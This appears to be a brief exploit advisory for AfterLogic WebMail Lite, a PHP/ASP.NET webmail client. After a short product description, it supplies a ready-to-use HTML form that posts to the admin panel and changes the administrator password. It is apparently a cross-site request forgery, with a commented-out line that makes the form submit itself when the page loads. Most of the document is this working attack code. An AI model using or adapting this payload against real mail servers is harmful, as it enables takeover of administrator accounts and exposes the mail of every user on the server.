AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client
with Ajax interface. AfterLogic WebMail Lite is available for both PHP
and ASP.NET platforms.
The version of AfterLogic WebMail Lite that is written in PHP is free
and open-source software subject to the terms of the Affero General
Public License (AGPL) version 3. The version written in ASP.NET is
proprietary software available as freeware.
And is deployed over 5/20 mailsevers, quite popular.
This exploit attempts to exploit the admin and get(s) us a new
password to the admin panel which should be located at
site.com/mail/adminpanel/index.php
<h2>After Logic Mail - Change Admin Password Exploit</h2>
<form action="http://localhost/webmail/adminpanel/index.php?submit"
method="POST" id="security_form">
<input type="hidden" name="form_id" value="security">
<input type="text" class="wm_input" name="txtUserName"
id="txtUserName" value="mailadm" size="30" />
<input type="password" class="wm_input" name="txtNewPassword"
id="txtNewPassword" value="newpass" size="30" />
<input type="password" class="wm_input" name="txtConfirmNewPassword"
id="txtConfirmNewPassword" value="newpass" size="30" />
<input type="submit" name="submit_btn" value="Save" id="automate">
</form>
<script>
//uncomment the second line for automation
//document.getElementById('automate').click();
</script>